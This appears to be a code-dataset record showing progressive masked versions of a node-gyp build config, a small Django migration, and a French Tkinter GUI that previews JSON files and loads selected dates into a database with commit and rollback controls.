{ "blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1", "index": 8439, "step-1": "<mask token>\n", "step-2": "{'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc',\n 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS==\"win\"', {\n 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11',\n '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'],\n 'cflags_cc!': ['-fno-exceptions']}]}\n", "step-3": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): dependencies = [('cstasker', '0001_initial')] operations = [migrations.AlterField(model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False))] <|reserved_special_token_1|> from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [('cstasker', '0001_initial')] operations = [migrations.AlterField(model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False))] <|reserved_special_token_1|> # -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-04-12 12:37 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cstasker', '0001_initial'), ] operations = [ migrations.AlterField( model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False), ), ]
flexible
{ "blob_id": "2fbf312e1f8388008bb9ab9ba0ee4ccee1a8beae", "index": 3594, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('cstasker', '0001_initial')]\n operations = [migrations.AlterField(model_name='usertask', name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False))]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('cstasker', '0001_initial')]\n operations = [migrations.AlterField(model_name='usertask', name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False))]\n", "step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.8 on 2018-04-12 12:37\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cstasker', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='usertask',\n name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class DataLoader: <|reserved_special_token_0|> def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. 
curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) <|reserved_special_token_0|> def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> <|reserved_special_token_0|> class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 
'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. 
curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) <|reserved_special_token_0|> def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> <|reserved_special_token_0|> class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 
'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. 
curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) def CaseCocher(self, mode='Transanction'): style = Style() style.configure('W.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='red') style.configure('G.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='green') def getCheckDict(obj): selectDate = {} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]] = [] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): choice = messagebox.askyesno('Askquestion!!!', 'Vous etes sur pour la validation') if choice == True: self.db.Alldayselected = getCheckDict(self.tree. 
get_checked()) if self.modeTransaction == False: self.db.insertCommunique() else: self.db.insertCommunique() else: messagebox.showerror(title='Erreur !!!', message= 'Cocher une case au moins !!!') def commit(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un commit?') if choice == True: messagebox.showinfo('Info', 'Mode Commit en cours') self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un rollback?') if choice == True: messagebox.showinfo('Info', 'Mode rollback en cours ') self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text= 'La liste des fichiers json obtenus avec leur arborescence', borderwidth=7, relief='groove') label_welcomec.grid(row=1, column=3, pady=8) vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview ) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert('', 'end', 'ALL', text='SELECT ALL') for key, val in self.anne.items(): self.tree.insert('ALL', 'end', key, text=key) for i in val: self.tree.insert(key, 'end', i, text=i) self.tree.grid(row=3, column=3, pady=2) button_name = Button(self.master, text='Valider', command=valider) button_name.grid(row=3, column=4, pady=2) if mode == 'Transanction': commit_buttoon_name = Button(self.master, text='COMMIT', command=commit, style='G.TButton') commit_buttoon_name.grid(row=4, column=3, pady=2) rollback_buttoon_name = Button(self.master, text='ROLLBACK !', style='W.TButton', command=rollback) rollback_buttoon_name.grid(row=4, column=4, pady=2) def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> from ttkwidgets import CheckboxTreeview from tkinter import * from tkinter.ttk import * from tkinter import messagebox import json import os from 
DbDataloader import * class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + 
Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) def CaseCocher(self, mode='Transanction'): style = Style() style.configure('W.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='red') style.configure('G.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='green') def getCheckDict(obj): selectDate = {} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]] = [] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): choice = messagebox.askyesno('Askquestion!!!', 'Vous etes sur pour la validation') if choice == True: self.db.Alldayselected = getCheckDict(self.tree. 
get_checked()) if self.modeTransaction == False: self.db.insertCommunique() else: self.db.insertCommunique() else: messagebox.showerror(title='Erreur !!!', message= 'Cocher une case au moins !!!') def commit(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un commit?') if choice == True: messagebox.showinfo('Info', 'Mode Commit en cours') self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un rollback?') if choice == True: messagebox.showinfo('Info', 'Mode rollback en cours ') self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text= 'La liste des fichiers json obtenus avec leur arborescence', borderwidth=7, relief='groove') label_welcomec.grid(row=1, column=3, pady=8) vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview ) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert('', 'end', 'ALL', text='SELECT ALL') for key, val in self.anne.items(): self.tree.insert('ALL', 'end', key, text=key) for i in val: self.tree.insert(key, 'end', i, text=i) self.tree.grid(row=3, column=3, pady=2) button_name = Button(self.master, text='Valider', command=valider) button_name.grid(row=3, column=4, pady=2) if mode == 'Transanction': commit_buttoon_name = Button(self.master, text='COMMIT', command=commit, style='G.TButton') commit_buttoon_name.grid(row=4, column=3, pady=2) rollback_buttoon_name = Button(self.master, text='ROLLBACK !', style='W.TButton', command=rollback) rollback_buttoon_name.grid(row=4, column=4, pady=2) def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> from ttkwidgets import CheckboxTreeview from tkinter import * from tkinter.ttk import * from tkinter import messagebox import json import os from 
DbDataloader import * class DataLoader(): def __init__(self,master): self.anne={} self.master=Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900,680) self.master.resizable(width=False,height=True) self.tree = CheckboxTreeview(self.master,height=25) os.chdir("DonneJson") with open("DonneUtile.json","r") as rf: self.anne.update(json.load(rf)) rf.close() os.chdir("..") self.Nomfichier=os.listdir("DonneJson") self.Nomfichier.sort(reverse=True) self.modeTransaction=False self.db=DbDataloader(self.modeTransaction,self.master) self.main() #Fonction pour lire les fichiers json deja dans le module DataAcquisition def main(self): choice= messagebox.askyesno("askquestion","Cliquer sur Oui pour charger les données en mode Trasactionnel") if choice : self.modeTransaction=True self.db.conn.start_transaction() self.master.title("Data Loader : Mode Transanction=­OUI") self.create_widgets() else: self.modeTransaction=False self.master.title("Data Loader : Mode Transanction=­NON") self.create_widgets("Non Transanction") def lireFichier(self): label_welcome1 = Label(self.master,text="Prévisualiser les données", borderwidth = 7, width = 40, relief="groove" ) label_welcome1.grid(row = 1, column = 0, padx = 50) label_welcome2 = Label(self.master,text="Selectionner le fichier pour la lecture") label_welcome2.grid(row = 2, column = 0, ) listbox = Listbox(self.master, width=40, height=20,selectmode=SINGLE) i=0 for fichier in self.Nomfichier: if "2" in fichier: listbox.insert(i, fichier) i=i+1 def afficherObjet(Obj): try: os.chdir("DonneJson") textFichier={} with open(Obj,"r") as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte="{\n" for key,val in textFichier.items(): b ="\t{\n" c="\t"+str(key)+" :\n" d="" for key1,val1 in val.items(): d=str(d)+"\t\t"+str(key1)+" :"+" "+str(val1)+"\n" e="\t},\n" texte=texte+b+c+d+e texte=texte+"}\n" texte=texte+"\n\n\t"+str(len(textFichier))+" Objets eenregistrer dans le fichier "+Obj 
os.chdir("..") return texte except Exception as e: print(e) messagebox.showerror(title="Erreur !!!", message="Fichier "+Obj+" introuvable") def selected_item(): try: if listbox.get(listbox.curselection()): textes=afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) # fenetre blocante : empeche l’ouverture de fenetres identiques self.master.wait_visibility(fil) fil.grab_set() # end fenetre blocante fil.geometry("600x600") fil.title("Fichier :"+listbox.get(listbox.curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil,wrap=NONE,height=30, width=100,yscrollcommand=yscroll.set, xscrollcommand=xscroll.set) text1.config(state="normal") text1.insert("1.0",textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except : messagebox.showerror(title="Erreur !!!", message="Vous selectionner un fichier d`abord") listbox.grid(row = 3, column = 0, pady =20 ) btn = Button(self.master, text='Lire Le Fichier', command=selected_item) btn.grid(row = 3, column = 1, pady =6 ) #Fonction pour cocher les dates ensuite enregistrer vers la bases de donneef def CaseCocher(self,mode="Transanction"): style = Style() style.configure('W.TButton', font = ('calibri', 15, 'bold', 'underline'), foreground = 'red') style.configure('G.TButton', font = ('calibri', 15, 'bold','underline'), foreground = 'green') #recuperer les ligne selectionnes def getCheckDict(obj): selectDate={} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]]=[] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): #si il choisi oui (en transanction) choice= messagebox.askyesno("Askquestion!!!","Vous etes sur pour la validation") if choice==True: self.db.Alldayselected =getCheckDict(self.tree.get_checked()) if self.modeTransaction == False: #Mode Non 
Transactionnel self.db.insertCommunique() else: #Mode Transaction self.db.insertCommunique() else: messagebox.showerror(title="Erreur !!!", message="Cocher une case au moins !!!") def commit(): choice= messagebox.askyesno("Askquestion!!!","Vouliez-vouz faire un commit?") if choice==True: messagebox.showinfo("Info","Mode Commit en cours") self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice= messagebox.askyesno("Askquestion!!!","Vouliez-vouz faire un rollback?") if choice==True: messagebox.showinfo("Info","Mode rollback en cours ") self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text="La liste des fichiers json obtenus avec leur arborescence", borderwidth = 7, relief="groove") label_welcomec.grid(row = 1, column = 3, pady = 8) vsb = Scrollbar(self.master, orient="vertical", command=self.tree.yview) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.020) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert("", "end", "ALL", text="SELECT ALL") for key,val in self.anne.items(): self.tree.insert("ALL", "end", key, text=key) for i in val: self.tree.insert(key,"end", i, text=i) self.tree.grid(row = 3, column = 3, pady = 2) button_name=Button(self.master,text="Valider",command=valider) button_name.grid(row = 3, column = 4, pady = 2) if mode=="Transanction": commit_buttoon_name=Button(self.master,text="COMMIT",command=commit,style="G.TButton" ) commit_buttoon_name.grid(row = 4, column = 3, pady = 2) rollback_buttoon_name=Button(self.master, text = 'ROLLBACK !', style = 'W.TButton',command=rollback) rollback_buttoon_name.grid(row = 4, column = 4, pady = 2) def create_widgets(self,mode="Transanction"): self.lireFichier() self.CaseCocher(mode) def mains(self,obj): obj.master.mainloop() obj.db.conn.rollback()
flexible
{ "blob_id": "a70dae504a4dfa3997a11e4c605accfab0024318", "index": 8796, "step-1": "<mask token>\n\n\nclass DataLoader:\n <mask token>\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n 
self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n <mask token>\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-2": "<mask token>\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n 
self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n 